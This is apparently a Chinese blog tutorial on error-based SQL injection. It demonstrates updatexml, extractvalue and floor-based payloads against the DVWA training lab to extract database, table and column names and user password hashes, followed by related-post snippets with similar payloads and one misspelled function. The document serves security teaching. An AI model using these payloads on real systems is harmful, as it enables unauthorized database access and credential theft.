SQL注入-报错注入

最新推荐文章于 2025-02-07 15:55:59 发布
原创 最新推荐文章于 2025-02-07 15:55:59 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #web安全 #mysql #渗透测试

本文介绍了SQL报错注入的原理,即数据库执行语法错误时会显示报错信息,若页面返回报错且存在SQL注入,可采用报错注入。还列举了常用函数,详细说明了判断注入点、注入敏感数据、查询用户名、表名、字段名和数据的方法,指出使用报错注入无需担心字符限制。

SQL注入-报错注入

原理:

数据库在执行时,遇到语法不对,会显示报错信息,开发期间,为方便调试,通常会采用一些异常处理函数来捕获报错信息,如果页面会返回报错信息并存在SQL注入,可以采用报错注入。

常用函数

updatexml(a,b,c):三个参数,a:指定xml文件string类,b:xpath语法(如果报错则会显示xpath的值),c:要替换的字符串。

extractvalue(a,b,c):三个参数,a:指定xml文件string类,b:xpath语法(如果报错则会显示xpath的值),c:要替换的字符串,与上一个用法是一样的。

floor():函数的作用就是返回小于等于括号内该值的最大整数,用法payload:select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);,报错核心为floor(rand(0)*2)

count():聚合函数,返回查询对象的总数。

rand():随机函数,取0~1之间某值。

concat():将结果拼接成为一条字符串。

order by:按照查询结果分组。

判断注入点:

环境:dvwa等级:low

我们在输入框里输入1',发现反回报错信息。

image-20220815112849767

有报错信息我们就可以尝试报错注入,输入1' and bc() --+:注:这里的bc()函数什么也不是,目的就是让他爆出数据库没有此函数的错误。

image-20220815112912259

发现报错并显示出数据库名称。

报错注入敏感数据:

payload:?id=1’ and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+:两边的1为字符串,你可以写任何东西,只要他是字符串类型,0x7e为波浪号~目的为容易区分回显位置。

image-20220815121847812

可以查到数据库名为dvwa

查询用户名:

payload:?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+:

image-20220815122521450

得出用户名为root

以此类推:

查询表名:

payload:?id=1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),0x7e),1)) --+:

image-20220815122901186

得出表明为guestbookusers

查询字段名:

payload:?id=1’ and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’),0x7e),1)) --+:

image-20220815123318232

这时我们发现,唉不对啊?查询出来的字段不够啊?那是因为使用updatexml()extractvalue()报错,只在页面显示32个字符串,所以我们需要对其进行截取。

payload:?id=1' and (updatexml(1,concat(0x7e,(select (substr((select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),32,32))),0x7e),1)) --+

image-20220815124637619

由此我们得到了第32到第64个的字符,在以此类推,最后拼接出来就是要查的内容了。

查询数据:

也是一样的,payload:?id=1' and (updatexml(1,concat(0x7e,(select (substr((select group_concat(user,0x3a,password) from users limit 0,1),1,32))),0x7e),1)) --+:

image-20220815131519784

付:

使用floor()报错注入是不用担心字符限制问题的。

SQL注入报错注入
qq_68163788的博客
01-27 3598
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库
SQL注入报错注入
Forget_liu的博客
06-10 1908
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
sql注入报错注入
m0_63436163的博客
08-27 1529
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
Sql注入-报错注入
WolvenSec的博客
06-06 2485
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql注入报错注入
2302_79119987的博客
04-19 2721
实行注入的地方。
sql注入-报错注入
爆金币了,老登!
07-09 775
针对于dvwa靶场的sql报错注入
CTFHUB-SQL注入-报错注入
weixin_68416970的博客
06-10 708
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
SQL注入-报错注入_如何判断是报错注入还是字符串注入
2401_84281703的博客
05-17 956
需要完整版PDF学习资源本次以SQLi第一关为案例。
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试安全训练时,皮卡丘靶场提供了...
SQL注入---报错注入
zhoutong2323的博客
04-04 1648
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
SQL注入报错注入
2401_88752684的博客
02-07 1073
当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。实际上该语句在查询过程中会产生虚拟表,在插入虚拟表的过程中,因为插入了一个重复的值,所以就会抛出主键冗余的异常。函数的第二个参数注入不符合Xpath语法的表达式,从而引起数据库报错,并通过错误信息获取数据。函数的第二个参数注入一个无效的Xpath表达式,导致函数报错,从而获取数据。函数,实现将注入结果与报错信息回显的注入方式。在Pikachu中,进行实践。
sql注入——报错注入
m0_73756016的博客
10-18 4305
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
sql 报错注入
travelnight的博客
03-15 4427
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL报错注入
qq_36760683的博客
05-07 1107
SQL报错注入:原文链接: http://wyb0.com/posts/injection-of-error-based/============================================================================一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,它的特点是注入速度快,但是语句较复...
sql注入实战报错注入
最新发布
03-14
### SQL 注入中的报错注入实际操作方法 #### 背景介绍 报错注入(Error-Based SQL Injection)是一种通过触发数据库错误消息来提取数据的技术。这种方法通常用于无法直接从页面获取查询结果的情况下,例如 `INSERT`、`UPDATE` 或 `DELETE` 查询[^1]。 当应用程序未正确过滤输入并允许恶意字符串进入 SQL 查询时,攻击者可以通过构造特定的 SQL 语句引发异常,并利用这些异常信息推断出目标系统的内部结构和数据[^3]。 --- #### 常见工具和技术 以下是几种常用的函数和技术,在报错注入中被广泛使用: 1. **UPDATEXML()** - 函数描述:`UPDATEXML()` 是 MySQL 中的一个内置函数,可以解析 XML 数据树并更新节点值。 - 使用场景:如果传入非法路径或无效参数,它会抛出详细的错误信息,其中可能包含拼接的数据。 - 示例代码: ```sql ' AND (SELECT UPDXML(1, CONCAT(0x7e, (SELECT database())), 1)) # ``` 上述代码试图通过 `CONCAT` 将当前数据库名称附加到错误消息中[^4]。 2. **ExtractValue()** - 函数描述:类似于 `UPDATEXML()`,`ExtractValue()` 可以用来解析 XML 文档的内容。 - 错误触发机制:提供不合法的 XPath 表达式即可让其崩溃,并暴露部分数据。 - 示例代码: ```sql ' AND ExtractValue(1, CONCAT(0x7e, (SELECT user()))) # ``` 3. **FLOOR()** - 函数描述:`FLOOR()` 返回不大于给定数值的最大整数。 - 利用方式:结合随机化或其他复杂逻辑制造重复键冲突,从而导致错误输出。 - 示例代码: ```sql ' ORDER BY FLOOR(RAND(0)*2) GROUP BY id # ``` --- #### 实战案例分析 假设存在一个简单的登录验证接口 `/login?username=admin&password=pass`,并且后台执行如下查询: ```sql SELECT * FROM users WHERE username = '$username' AND password = '$password'; ``` 此时,如果我们提交以下请求: ```http /login?username=k' AND UPDATEXML(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 1)), 1)-- &password=any ``` 服务器可能会返回类似这样的错误响应: > XPATH syntax error: '~tablename' 这表明我们成功地从 `information_schema.tables` 获取到了第一个表的名字。 继续深入挖掘列名或者具体记录的过程也遵循相同原理——逐步嵌套子查询直到达到目的为止。 --- #### 防护措施建议 为了防止此类攻击发生,请务必采取以下预防手段之一或多条组合策略: - 对所有外部可控变量实施严格的白名单校验; - 启用预编译语句代替动态组装SQL串; - 关闭不必要的调试模式以及隐藏敏感堆栈跟踪详情; ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小洋葱头头

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值